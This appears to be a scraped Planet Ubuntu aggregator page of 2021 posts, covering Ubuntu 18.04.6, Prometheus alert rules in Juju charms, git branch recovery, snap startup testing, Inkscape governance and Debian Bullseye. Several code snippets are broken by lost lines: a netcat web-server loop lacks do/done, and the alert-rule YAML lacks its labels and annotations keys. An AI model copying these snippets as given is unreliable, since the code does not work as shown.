September 17, 2021

The Ubuntu team is pleased to announce the release of Ubuntu 18.04.6 LTS (Long-Term Support) for its Desktop and Server products.

Unlike previous point releases, 18.04.6 is a refresh of the amd64 and arm64 installer media after the key revocation related to the BootHole vulnerability, re-enabling their usage on Secure Boot enabled systems. More detailed information can be found here:

Many other security updates for additional high-impact bug fixes are also included, with a focus on maintaining stability and compatibility with Ubuntu 18.04 LTS.

Maintenance updates will be provided for 5 years for Ubuntu Desktop, Ubuntu Server, Ubuntu Cloud, and Ubuntu Base.

To get Ubuntu 18.04.6

In order to download Ubuntu 18.04.6, visit:

Users of Ubuntu 16.04 LTS will be offered an automatic upgrade to 18.04.6 via Update Manager. For further information about upgrading, see:

As always, upgrades to the latest version of Ubuntu are entirely free of charge.

We recommend that all users read the 18.04.6 release notes, which document caveats and workarounds for known issues, as well as more in-depth notes on the release itself. They are available at:

If you have a question, or if you think you may have found a bug but aren’t sure, you can try asking in any of the following places:

#ubuntu on

Help Shape Ubuntu

If you would like to help shape Ubuntu, take a look at the list of ways you can participate at:

About Ubuntu

Ubuntu is a full-featured Linux distribution for desktops, laptops, clouds and servers, with a fast and easy installation and regular releases. A tightly-integrated selection of excellent applications is included, and an incredible variety of add-on software is just a few clicks away.

Professional services including support are available from Canonical and hundreds of other companies around the world. For more information about support, visit:

More Information

You can learn more about Ubuntu and about this release on our website listed below:

To sign up for future Ubuntu announcements, please subscribe to Ubuntu’s very low volume announcement list at:

Originally posted to the ubuntu-announce mailing list on Fri Sep 17 08:47:54 UTC 2021 by Łukasz ‘sil2100’ Zemczak, on behalf of the Ubuntu Release Team

on September 17, 2021 11:52 PM

This post is about alert rules. Operators should ensure a baseline of observability for the software they operate. In this blog post, we cover Prometheus alert rules, how they work and their gotchas, and discuss how Prometheus alert rules can be embedded in Juju charms and how Juju topology enables the scoping of embedded alert rules to avoid inaccuracies.

In the first post of this series, we covered the general idea and benefits of model-driven observability with Juju. In the second post, we dived into the Juju topology and its benefits with respect to entity stability and metrics continuity. In the third post, we discussed how the Juju topology enables grouping and management of alerts, helps prevent alert storms, and how that relates with SRE practices.

The running example

In the remainder of this post, we will use the following example:

<noscript> <img alt="" src=",q_auto,fl_sanitize,c_fill,w_720/" width="720" /> </noscript>

A depiction of three related Juju models: “lma”, “production” and “qa”. The “lma” model contains the monitoring processes; the “production” and “qa” models contain each one “users-db” Juju application, consisting of one Cassandra cluster. Both Cassandra clusters are monitored by Prometheus deployed in the “lma” model.

In the example above, the “monitoring” relations between Prometheus and the two Cassandra clusters, each residing in a different model, result in Prometheus scraping the metrics endpoint provided by the Cassandra nodes. The cassandra-k8s charm, when related to a Prometheus charm over the “monitoring” relation, automatically sets up Instaclustr’s Cassandra Exporter on all cluster nodes. The resulting metrics endpoints are scraped by Prometheus without any manual intervention by the Juju administrator.

Prometheus alert rules

When monitoring systems using Prometheus, alert rules define anomalous situations that should trigger alerts. Below is an example of a typical alert rule definition:

alert: PrometheusTargetMissing
expr: up == 0
for: 0m
  severity: critical
  summary: Prometheus target missing (instance {{ $labels.instance }})
  description: "A Prometheus target has disappeared."

The rule above is adapted from the very excellent Awesome Prometheus alerts, which provides libraries of alert rules for a variety of technologies that can be monitored with Prometheus.

Alert rule ingredients

There are a few key parts to an alert rule:

  • The value of the “alert” field is the identifier (also known as “alertname”) of the alert rule.
  • The “expr” field specifies a PromQL query; in the example above, the query is straightforward: it looks for values of the built-in “up” timeseries, that Prometheus fills with “1” when successfully scraping a target, and “0” when the scraping fails.
  • The “for” field specifies a grace period, that is, a time duration over which the PromQL query at “expr” must consistently evaluate as false before the alert is fired. The default of the “for” field is zero, which means that the alert will be fired as soon as the PromQL query fails; it is good practice to choose a less ‘twitchy’ value than this for most alerts. Overall, the goal is to strike a good trade-off between detecting issues as soon as possible, and avoiding false positives resulting from flukes or transient failures.
  • The “label” and “annotation” fields allow you to specify metadata for the alerts, like their “severity”, “summary”, and “description”. None of the labels or annotations are actually required, but are indeed customary in many setups. And if you are pondering the difference between labels and annotations, it is precisely like in Kubernetes: labels are meant to be machine-readable, annotations are for informing people. You can use labels with the built-in templating language for alert rules to generate the values of annotations, as well as specifying matchers in Alertmanager routes to decide how to process those alerts.

Gotchas when specifying alert rules

There are a few things to watch out for when specifying alert rules.

Metadata consistency is key

I have already mentioned the need for consistency in your labels and annotations, with specific emphasis on the way you specify the severity of an alert. Please do not get inspired by the chaos that is “severity levels” in logging libraries (especially prevalent in the Java ecosystem). Rather, use whatever model for incident severity is defined in your operational procedures.


Another big, and maybe bigger gotcha is how you scope your alert rules. In the example above we have conspicuously omitted a very important ingredient to a PromQL query: label filters. Label filters allow you to select which specific timeseries are going to be evaluated for the rule by Prometheus across all timeseries with the same name, in our case “up”. That is, the alert rule we used as an example will trigger separately for any timeseries named “up” with a value of “0” and generate a separate, critical alert! This is likely not optimal: after all, not all systems are equally important, and you should be woken up at night during your rotations only when genuinely important systems are having issues. (Remember what we discussed about alert fatigue in another post!)

Assuming that your Prometheus is monitoring both production and non-production workloads, and that the “environment” label contains the identifier of the deployment, the following might be a better alert rule:

alert: PrometheusTargetMissing
expr: up{environment="production"} == 0
for: 0m
  severity: critical
  summary: Prometheus target missing in production (instance {{ $labels.instance }})
  description: "A Prometheus target has disappeared from a production deployment."

By filtering the “up” timeseries to those with the label “environment” matching “production”, alert rules with critical severity will be issued only for timeseries collected from production systems, rather than all of them. (By the way, if you have multiple production deployments, PromQL has a handy regexp-based matching of labels via the “=~” operator.)


Notice how, in the previous section, the revised alert rule still uses the value “0m” for the for key. That means that as soon as the Prometheus scraping has a hiccup, an alert is fired. Prometheus scraping occurs over networks, and the occasional fluke is pretty much a given. Moreover, depending on how you configure Prometheus’ scrape targets, there may be lag between your workloads being decommissioned, and Prometheus ceasing to scrape them, which is a strong source of false positives when alert rules are too sensitive.

Over-sensitivity of alert rules is what the “for” keyword is for, but figuring out the right value is non-trivial. In general, you should select the value of “for” to be:

  • Not higher than the maximum amount of time you can tolerate for an issue to go undiscovered, which very much relates to the targets you have defined (e.g. for your Service Level Objectives).
  • Not lower than two or three times the frequency of the scraping job that produces those timeseries.

The minimum tolerance for an alert rule is very interesting. Prometheus scrapes targets for metrics values with a frequency that is specified on the scrape job, with default of one minute. Similarly to the way the Nyquist–Shannon sampling theorem creates a link between sampling continuous signals without losing information, you should not define an alert rule duration that is too close to the sampling interval of the scrape jobs it relies on. Depending on the workload of Prometheus, and how quickly the scraping is executed (after all, it’s an HTTP call that is served by most Prometheus endpoints synchronously), you are all but guaranteed to have variability in the time interval between two successive data points in a given Prometheus timeseries. As such, you need a tolerance margin built-in to your “for” setting. A good rule of thumb is to have the value of “for” to be two to three times higher than the maximum scrape interval of the scrape jobs producing the relevant timeseries.

Embedding alert rules in Juju charms

The Prometheus charm library provides easy-to-integrate means for charm authors to expose the metrics endpoints provided by applications to the Prometheus charm. Similarly, adding alert rules to a charm is as easy as adding “rule files” to a folder in your charm source code (cf. the cassandra-operator repository).

There are two interesting aspects to be discussed about alert rules embedded in charms: how to scope them, and the nature of the issues that are meant to be detected by those alert rules.

Scoping of embedded alert rules

As discussed in the section about alert scoping, it is fundamentally to correctly restrict which systems are monitored by which alert rules, which in Prometheus is achieved by applying label filters to the alert rule expression based on the timeseries labels.

When monitoring software that is operated by Juju, the Juju topology provides just what we need to ensure that alert rules embedded in a charm apply separately to each single deployment of that charm. The Juju topology is a set of labels for telemetry (and alert rules!) that uniquely identifies each instance of a workload operated by Juju. All it takes to leverage the Juju topology with alert rules, is writing the alert rule adding the %%juju_topology%% token in the label filter for the timeseries:

alert: PrometheusTargetMissing
expr: up{%%juju_topology%%} == 0
for: 0m
  severity: critical
  summary: Prometheus target missing in production (instance {{ $labels.instance }})
  description: "A Prometheus target has disappeared from a production deployment."

At runtime, the Prometheus charm replaces the %%juju_topology%% token with the actual juju topology of the system, like the following:

alert: PrometheusTargetMissing
expr: up{juju_application="user-db",juju_model="production",juju_model_uuid="75fcb386-daa0-4681-8b4d-786481381ee2"
} == 0
for: 0m
  severity: critical
  summary: Prometheus target missing in production (instance {{ $labels.instance }})
  description: "A Prometheus target has disappeared from a production deployment."

Having all the Juju topology labels reliably added to your alert rules ensures that there is a separate instance of the alert rule for every deployment of the charm, and those rules are evaluated in isolation for each deployment. There is no possibility that your alert rule will be mixing data across different deployments and, in so doing, cause false positives or negatives.Besides: something we are looking at, is actually entirely automating the injection of the Juju topology in the timeseries queried by embedded alert rules, forsaking the need of adding the %%juju_topology%%. While this is not particularly easy to achieve (it requires a parser for PromQL, a lexer, and a bunch of other machinery), this is going to be an iterative improvement we are very much looking forward to, as it eliminates the risk of charm authors shipping incorrectly-scoped alert rules.

Nature of embedded alert rules

When embedding alerts in a charm, the author will almost certainly specify rules aiming at detecting failure modes of the software operated by the charm. For example, in the Cassandra charm, we embed rules for detecting write and read failures of requests, or issues with compaction (a process Cassandra uses to optimize the use of storage and memory dropping, for example, outdated data).

According to the categorization of alerts described in “My Philosophy on Alerting” by Rob Ewaschuk, such alert rules are “cause-based alerts”. Cause-based alerts can be noisy, mostly because they tend to be redundant, with multiple alert rules triggered by the same issue. For example, an undersized CPU can make Cassandra sad in many different ways all at once. However, cause-based alerts also allow you to quickly identify the source of issues, especially if you are aware of what impacts various types of issues have on your end users (“when the users-db database is down, users trying to log will see errors”).

Of course, model-driven observability with Juju needs a way of specifying “symptom-based”, that is, detecting issues that directly impact and are visible to end-users. However, those alerts are not something that a charm author can embed in a charm, but rather are the responsibility of the Juju administrators, as the kind of alert rules one must specify depend on the overall architecture of the applications operated by Juju. We will come back to this topic in a future post.

What’s next

In this blog post I covered the basics of alerting with Prometheus, how Juju charm authors can embed alert rules within their charms, and how the Juju topology enables the scoping of these alert rules to single Juju applications, avoiding one of the pitfalls of writing alert rules. The following installments of this series will cover:

  • The benefits of Juju topology for Grafana dashboards
  • How to bundle Grafana Dashboards with your charms, and let Juju administrators import them in their Grafana deployments with one Juju relation
  • How Juju administrators can specify alert rules, which enables them to set up symptom-based monitoring for Juju-operated applications 

Meanwhile, you could start charming your applications running on Kubernetes. Also, have a look at the various charms available today for a variety of applications.

Other posts in this series

If you liked this post…

Find out about other observability workstreams at Canonical!

Also, Canonical recently joined up with renowned experts from AWS, Google, Cloudbees, and others to analyze the outcome of a comprehensive survey administered to more than 1200 KubeCon respondents. The resulting insightful report on the usage of cloud-native technologies is available here: Kubernetes and cloud native operations report 2021.

on September 17, 2021 11:50 AM

So you just broke that PR you’ve been working on for months?

One day, you find yourself force pushing over your already existing Pull request/branch, because like me, you like to reuse funny names:

git fetch origin
git checkout tellmewhy #already exists and has a pull request still open, but you didn't know
git reset --hard origin/master
# hack hack hack
git commit $files
git push -f nameofmyremote



Here’s when you realize that You’ve done something wrong, very very wrong, because github will throw the message:

Error creating pull request: Unprocessable Entity (HTTP 422)
A pull request already exists for foursixnine:tellmewhy.

So, you already broke your old PR with a completely unrelated change,

what do you do?

Don’t panic

don't panic

If you happen to know what’s the previous commit id, you can always pick it up again (go to for instance and look for the PR with the branch), AND, AND, AAANDDDD, ABSOLUTELY ANDDDD, you haven’t ran git gc.

In my case:

@foursixnine foursixnine force-pushed the tellmewhy branch from 9e86f3a to **9714c93** 2 months ago

All there’s to do is:

git checkout $commit
# even better:
git checkout tellmewhy # old branch with new commits that are unrelated/overwritten over the old ones
git checkout -b tellmewhyagain # your new copy, open your pr from here
git push tellmewhyagain # now all is "safe" in the cloud
git checkout tellmewhy # Let's bring the dead back to life
git reset --hard 9714c93
git push -f tellmewhy

And this is it, you’ve brought the dead back to life

on September 17, 2021 12:00 AM

September 16, 2021

Ep 160 – Vai e Volla

Podcast Ubuntu Portugal

O Diogo foi às compras! Fazia tempo que o nosso comprador compulsivo não se auto presenteava com aquisições tecnológicas, desta vez foi um Volla phone… O Carrondo andou a instalar o exbin e a ampliar redes Devolo.

Já sabem: oiçam, subscrevam e partilhem!



Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal.
E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8.
Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem.

Se estiverem interessados em outros bundles não listados nas notas usem o link e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino e Tiago Carrondo e editado por Alexandre Carrapiço, o Senhor Podcast.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da [CC0 1.0 Universal License](

Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on September 16, 2021 09:30 PM

Snaps are used on desktop machines, servers and IoT devices. However, it’s the first group that draws the most attention and scrutiny. Due to the graphic nature of desktop applications, users are often more attuned to potential problems and issues that may arise in the desktop space than with command-line tools or software running in the background.

Application startup time is one of the common topics of discussion in the Snapcraft forums, as well as the wider Web. The standalone, confined nature of snaps means that their startup procedure differs from the classic Linux programs (like those installed via Deb or RPM files). Often, this can translate into longer startup times, which are perceived negatively. Over the years, we have talked about the various mechanisms and methods introduced into the snaps ecosystem, designed to provide performance benefits: font cache improvements, compression algorithm change, and others. Now, we want to give you a glimpse of a Skunk Works* operation inside Canonical, with focus on snaps and startup performance.


While speed improvements are always useful and warmly received by the users, consistency of results is equally (if not more) important. A gain of a second is often less beneficial than the loss of that same second later on in the software’s lifecycle. An application whose startup time has improved is expected to remain that way, and users will typically respond with greater negativity to any new time delay than they had to the original manifestation of the issue.

Performance-related regressions present a difficult challenge, and they tie into two main aspects of software development: actual, tangible changes in the code, and the overall understanding and control of the system.

To address these, Canonical’s Certification team uses the Checkbox test automation software suite to perform a range of hands-off regression and performance tests for different Canonical products. The tool offers a great deal of flexibility, including custom tasks and reporting. Snap testing is also available through the checkbox-desktop-snaps utility (also distributed as a snap).

<noscript> <img alt="" src=",q_auto,fl_sanitize,c_fill,w_720/" width="720" /> </noscript>
<noscript> <img alt="" src=",q_auto,fl_sanitize,c_fill,w_720/" width="720" /> </noscript>

By default, Checkbox will measure the cold (no cached data) and hot (cached data) startup times of 10 prominent desktop snaps on multiple hardware platforms, and report the results. But things really get interesting when we look at the environment setup.

Interaction between system and snap

Regardless of the technology and tooling used, measuring execution times in software can be tricky, because it is difficult to separate (or sanitize) the application in question from the overall system. A program that has network connectivity may report inconsistent results depending on the traffic throughput and latency. Different disk types and I/O activity will also affect the timing. There may be significant background activity on the machine, which can also introduce noise, and skew the results. The list of possible obstacles goes on and on.

In situations like these, which are designed to simulate real-life usage conditions, the idea is not to ignore or remove the common phenomena, but to normalize them in a way that will offer reliable results. For example, repeated testing during different times of the day can remove some of the variation in results related to network or disk activity.

With Checkbox and snaps, we decided to go one step further, and that is to also directly examine the impact both the operating systems and the snaps themselves have on the startup measurement results!

One change at a time

Before we can claim full understanding of the system, we need to understand how different components interact. With snaps, there are many variables that come into play. For instance, if a snap refreshes and receives an update, can we treat the new startup results as part of the same set as earlier data, or a brand new set? If there is a kernel update, can we or should we expect snap startup times not to change?

Isolating the different permutations of a typical Linux machine is not trivial. To that end, we decided to create two distinct sets of tests:

  • Immutable systems that do not have any updates, and only the installed snaps change through periodic refreshes. Whenever there is a snap update, the Checkbox testing starts, and new data is collected. This way, it is possible to determine whether any change in the startup times, for better or worse, stems from the actual changes in the snap applications.
  • Immutable snaps tested on systems that receive updates. Here, we keep snaps pegged to a specific version (e.g.: Firefox 89, VLC 3.0.8), and then trigger testing whenever there is a system change in one of the five critical components: kernel, glibc, graphics drivers, apparmor, and snapd. This way, we can correlate any changes in the startup behavior of one or more snaps to the system updates.
<noscript> <img alt="" src=",q_auto,fl_sanitize,c_fill,w_720/" width="720" /> </noscript>
Example of the Firefox startup time testing on an immutable system on a sample hardware platform. The blue lines indicate any Firefox refresh in the beta channel. The testing covers multiple OS releases (20.04 shown). The significant improvement in the cold start seen on the right side of the graph can now be traced to the specific changes introduced in the particular build of the snap.

We run the tests with multiple configurations in place:

  • Hardware with both different graphics cards.
  • Hardware with mechanical disks and SSD.
  • Supported LTS releases and the latest development image.

The extensible nature of the Checkbox tool allows the inclusion of any snaps, any number of snaps, and custom tests can also be added, if needed. For instance, on top of the startup times, the tool can collect screenshots, which then also allow for visual comparison of the results, like possible inconsistencies in theming among different snaps, desktop environments, and different versions of desktop environments.

From data to control

When we first started collecting the numbers on startup times, we focused on the actual figures. However, in the larger scheme of things, these values are less important than the relative differences of the collected results under different conditions for the same snaps, on the same hardware configuration. For instance, how does a snap startup time change when moving from one LTS image to another? Do kernel updates affect the results?

Once we can establish how snaps behave under various operational conditions, we can then create a baseline. Minimum and maximum values, average times, and other parameters, for which we can create alerts. This will allow us to identify any potentially bad results in a snap behavior, as part of our testing, and immediately flag system changes (or snap refreshes) that may lead to a degraded user experience.


Snap startup time data collection and analysis goes beyond just making sure the snaps launch quickly, and that users have a good experience. The mechanism also allows us to much better understand the complex interaction between hardware and software, and different operating system components. As we expand our work with the Checkbox tool, we will be able to create complex formulas that tell us how kernel updates, system patches, or perhaps snap refreshes affect the startup performance. We already know that using the LZO compression for snap packaging can lead to 50-60% improvements. Perhaps adding a new library into a snap can make a big difference? Or maybe certain distro releases are faster than others?

At the moment, Checkbox is designed to work under the GNOME desktop environment, but we also have test builds that can collect data on KDE and Xfce, too. We’re constantly improving the framework, and we’re looking for ways to improve its usability – easier sideloading of tests, test customization, configuration, data export, etc. If you have any comments or ideas, please join our forum, and let us know.

Article written by Igor Ljubuncic and Sylvain Pineau.

* Skunk Works is an official pseudonym for Lockheed Martin’s Advanced Development Programs (ADP), formerly called Lockheed Advanced Development Projects, coined in the 1940s, and since widely adopted by business and companies for their cool, out-of-band, secretive, or state-of-art projects.

Photo by lalo Hernandez on Unsplash.

on September 16, 2021 03:37 PM

S14E28 – Tanks Rewarding Gender

Ubuntu Podcast from the UK LoCo

This week we’ve been playing with Steam and the Windows Terminal. We look back at how Ubuntu and evolved over the years, bring you some command line love and go over all your feedback.

It’s Season 14 Episode 28 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

  • We discuss what we’ve been up to recently:
  • We have a little Ubuntu retrospective.
  • We share a Command Line Lurve:
    • Bash web server – serve bash command output as a web page
pip install ansi2html
while true;
  echo -e "HTTP/1.1 200 OK\n\n$(top -n 1 | ansi2html)" | nc -l -k -p 8080 -q 1;

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Toot us or Comment on our Facebook page or comment on our sub-Reddit.

on September 16, 2021 02:00 PM

September 13, 2021

Welcome to the Ubuntu Weekly Newsletter, Issue 700 for the week of September 5 – 11, 2021. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on September 13, 2021 10:34 PM

Mid-September Seasonal Update

Stephen Michael Kellat

Rather than a bullet point list I will just be brief. The ballots are posted for the November 2nd general election and I’m still trying to wrap my head around seeing my name appear on the ballot. The odds are not in my favor on this but I will do what I can to see this through.

I’ve been spending quite a bit of time away from computers. Why? Well, I’ve been in the woods looking for things throughout Indian Trails Park. The Ashtabula River gulf area has many mysteries within it that frankly cannot be explained.

The situation locally is starting to get a bit out of control. It is very hard to conduct a political campaign with the coronavirus situation in our local hospitals getting bad to the point that we are seeing overload intensive care units in one part of the state. The arguments over the use of the law to deal with the pandemic are simply overwhelming.

Things will eventually straighten out, I hope. Unfortunately that doesn’t appear to be in the immediate forecast. Rough waters remain ahead.

Tags: Life

on September 13, 2021 08:07 AM

September 09, 2021

Ep 159 – Torpedear

Podcast Ubuntu Portugal

Algumas corecções, é sempre bom, novidades da rubrica “As extensões que eu uso…”, informações/dicas úteis para quem usa lxc/lxd, os wallpapers da nova versão Impish Indri e a simplificação do processo de submissão de candidaturas a novos membros Ubuntu.

Já sabem: oiçam, subscrevam e partilhem!



Podem apoiar o podcast usando os links de afiliados do Humble Bundle, porque ao usarem esses links para fazer uma compra, uma parte do valor que pagam reverte a favor do Podcast Ubuntu Portugal.
E podem obter tudo isso com 15 dólares ou diferentes partes dependendo de pagarem 1, ou 8.
Achamos que isto vale bem mais do que 15 dólares, pelo que se puderem paguem mais um pouco mais visto que têm a opção de pagar o quanto quiserem.

Se estiverem interessados em outros bundles não listados nas notas usem o link e vão estar também a apoiar-nos.

Atribuição e licenças

Este episódio foi produzido por Diogo Constantino e Tiago Carrondo e editado por Alexandre Carrapiço, o Senhor Podcast.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da [CC0 1.0 Universal License](

Este episódio e a imagem utilizada estão licenciados nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

on September 09, 2021 09:45 PM

S14E27 – Drip With Nods

Ubuntu Podcast from the UK LoCo

This week we’ve been buying technology from Russia and playing OpenSpades. We announce that the Ubuntu Podcast is ending and round up our favourite stories from the tech news.

It’s Season 14 Episode 27 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Toot us or Comment on our Facebook page or comment on our sub-Reddit.

on September 09, 2021 02:00 PM

September 08, 2021

When Inkscape was started, it was a loose coalition of folks that met on the Internet. We weren’t really focused on things like governance, the governance was mostly who was an admin on SourceForge (it was better back then). We got some donated server time for a website and we had a few monetary donations that Bryce handled mostly with his personal banking. Probably one of our most valuable assets, our domain, was registered to and paid for by Mentalguy himself.

Realizing that wasn’t going to last forever we started to look into ways to become a legal entity as well as a great graphics program. We decided to join the (then much smaller) Software Freedom Conservancy which has allowed us to take donations as a non-profit and connected us to legal and other services to ensure that all the details are taken care of behind the scenes. As part of joining The Conservancy we setup a project charter, and we needed some governance to go along with that. This is where we officially established what we call “The Inkscape Board” and The Conservancy calls the Project Leadership Committee. We needed a way to elect that board, for which we turned to the AUTHORS file in the Inkscape source code repository.

Today it is clear that the AUTHORS file doesn’t represent all the contributors to Inkscape. It hasn’t for a long time and realistically didn’t when we established it. But it was easy. What makes Inkscape great isn’t that it is a bunch of programmers in the corner doing programmer stuff, but that it is a collaboration between people with a variety of skill sets bringing those perspectives together to make something they couldn’t build themselves.

Who got left out? We chose a method that had a vocational bias, it preferred people who are inclined to and enjoy computer programming. As a result translators, designers, technical writers, article authors, moderators, and others were left out of our governance. And because of societal trends we picked up both a racial and gender bias in our governance. Our board has never been anything other than a group of white men.

We are now taking specific actions to correct this in the Inkscape charter and starting to officially recognize the contributions that have been slighted by this oversight.

Our core of recognizing contributors has always been about peer-review with a rule we’ve called the “two patch rule.” It means that with two meaningful patches that are peer-reviewed and committed you’re allowed to have commit rights to the repository and added to the AUTHORS file. We want to keep this same spirit as we start recognize a wider range of contributions so we’re looking to make it the “two peers rule.” Here we’ll add someone to the list of contributors if two peers who are contributors say the individual has made significant contributions. Outside of the charter we expect each group of contributors will make a list of what they consider to be a significant contribution so that potential contributors know what to expect. For instance, for developers it will likely remain as patches.

We’re also taking the opportunity to build a process for contributors who move on to other projects. Life happens, interests change, and that’s a natural cycle of projects. But our old process which focused more on copyright of the code didn’t allow for contributors to be marked as retired. We will start to track who voted in elections (board members, charter changes, about screens, etc.) and contributors who fail to vote in two consecutive elections will be marked as retired. A retired contributor can return to active status by simply going through the “two peers rule.”

These are ideas to start the discussion, but we always want more input and ideas. Martin Owens will be hosting a video chat to talk about ideas surrounding how to update the Inkscape charter. Also, we welcome anyone to post on the mailing list for Inkscape governance.

As a founder it pains me to think of all the contributions that have gone unrecognized. Sure there were “thank yous” and beers at sprints, but that’s not enough. I hope this new era for Inkscape will see these contributions recognized and amplified so that Inkscape can continue to grow. The need for Free Software has only grown throughout Inkscape’s lifetime and we need to keep up!

on September 08, 2021 12:00 AM

September 07, 2021

Debian 11 (codename Bullseye) was recently released. This was the smoothest upgrade I've experienced in some 20 years as a Debian user. In my haste, I completely forgot to first upgrade dpkg and apt, doing a straight dist-upgrade. Nonetheless, everything worked out of the box. No unresolved dependency cycles. Via my last-mile Gigabit connection, it took about 5 minutes to upgrade and reboot. Congratulations to everyone who made this possible!

Since the upgrade, only a handful of bugs were found. I filed bug reports. Over these past few days, maintainers have started responding. In once particular case, my report exposed a CVE caused by copy-pasted code between two similar packages. The source package fixed their code to something more secure a few years ago, while the destination package missed it. The situation has been brought to Debian's security team's attention and should be fixed over the next few days.


Having recently experienced hard-disk problems on my main desktop, upgrading to Bullseye made me revisit a few issues. One of these was the possibility of transiting to BTRFS. Last time I investigated the possibility was back when Ubuntu briefly switched their default filesystem to BRTFS. Back then, my feeling was that BRTFS wasn't ready for mainstream. For instance, the utility to convert an EXT2/3/4 partition to BTRFS corrupted the end of the partition. No thanks. However, in recent years, many large-scale online services have migrated to BRTFS and seem to be extremely happy with the result. Additionally, Linux kernel 5 added useful features such as background defragmentation. This got me pondering whether now would be a good time to migrate to BRTFS. Sadly it seems that the stock kernel shipping with Bullseye doesn't have any of these advanced features enabled in its configuration. Oh well.


The only point that has become problematic is my Geode hosts. For one things, upstream Rust maintainers have decided to ignore the fact that i686 is a specification and arbitrarily added compiler flags for more recent x86-32 CPUs to their i686 target. While Debian Rust maintainers have purposely downgraded the target, RustC still produces binaries that the Geode LX (essentially an i686 without PAE) cannot process. This affects fairly basic packages such as librsvg, which breaks SVG image support for a number of dependencies. Additionally, there's been persistent problems with systemd crashing on my Geode hosts whenever daemon-reload is issued. Then, a few days ago, problems started occurring with C++ binaries, because GCC-11 upstream enabled flags for more recent CPUs in their default i686 target. While I realize that SSE and similar recent CPU features produce better binaries, I cannot help but feel that treating CPU targets as anything else than a specification is a mistake. i686 is a specification. It is not a generic equivalent to x86-32.

on September 07, 2021 11:21 AM

September 06, 2021

Web Hooks for the Janitor

Jelmer Vernooij

The Debian Janitor is an automated system that commits fixes for (minor) issues in Debian packages that can be fixed by software. It gradually started proposing merges in early December. The first set of changes sent out ran lintian-brush on sid packages maintained in Git. This post is part of a series about the progress of the Janitor.

As covered in my post from last week, the Janitor now regularly tries to import new upstream git snapshots or upstream releases into packages in Sid.

Moving parts

There are about 30,000 packages in sid, and it usually takes a couple of weeks for the janitor to cycle through all of them. Generally speaking, there are up to three moving targets for each package:

  • The packaging repository; vcswatch regularly scans this for changes, and notifies the janitor when a repository has changed. For salsa repositories it is instantly notified through a web hook
  • The upstream release tarballs; the QA watch service regularly polls these, and the janitor scans for changes in the UDD tables with watch data (used for fresh-releases)
  • The upstream repository; there is no service in Debian that watches this at the moment (used for fresh-snapshots)

When the janitor notices that one of these three targets has changed, it prioritizes processing of a package - this means that a push to a packaging repository on salsa usually leads to a build being kicked off within 10 minutes. New upstream releases are usually noticed by QA watch within a day or so and then lead to a build. Now commits in upstream repositories don’t get noticed today.

Note that there are no guarantees; the scheduler tries to be clever and not e.g. rebuild the same package over and over again if it’s constantly changing and takes a long time to build.

Packages without priority are processed with a scoring system that takes into account perceived value (based on e.g. popcon), cost (based on wall-time duration of previous builds) and likelihood of success (whether recent builds were successful, and how frequently the repositories involved change).

webhooks for upstream repositories

At the moment there is no service in Debian (yet - perhaps this is something that vcswatch or a sibling service could also do?) that scans upstream repositories for changes.

However, if you maintain an upstream package, you can use a webhook to notify the janitor that commits have been made to your repository, and it will create a new package in fresh-snapshots. Webhooks from the following hosting site software are currently supported:

You can simply use the URL as the target for hooks. There is no need to specify a secret, and the hook can either use a JSON or form encoding payload.

The endpoint should tell you whether it understood a webhook request, and whether it took any action. It’s fine to submit webhooks for repositories that the janitor does not (yet) know about.


For GitHub, you can do so in the Webhooks section of the Settings tab. Fill the form as shown below and click on Add webhook:


On GitLab instances, you can find the Webhooks tab under the Settings menu for each repository (under the gear symbol). Fill the form in as shown below and click Add Webhook:


For Launchpad, go to the repository (for Git) web view and click Manage Webhooks. From there, you can add a new webhook; fill the form in as shown below and click Add Webhook:

on September 06, 2021 08:00 PM

September 05, 2021

Last week I was part of a meeting with the UK’s Competition and Markets Authority, the regulator, to talk about Apple devices and the browser choice (or lack of it) on them. They’re doing a big study into Apple’s conduct in relation to the distribution of apps on iOS and iPadOS devices in the UK, in particular, the terms and conditions governing app developers’ access to Apple’s App Store, and part of that involves looking at browsers on iOS, and part of that involves talking to people who work on the web. So myself and Bruce Lawson and another UK developer of iOS and web apps put together some thoughts and had a useful long meeting with the CMA on the topic.

They asked that we keep confidential the exact details of what was discussed and asked, which I think is reasonable, but I did put together a slide deck to summarise my thoughts which I presented to them, and you can certainly see that. It’s at and shows everything that I presented to the CMA along with my detailed notes on what it all means.

A slide from the presentation, showing a graph of how far behind Safari is and indicating that all other browsers on iOS are equally far behind, because they're all also Safari

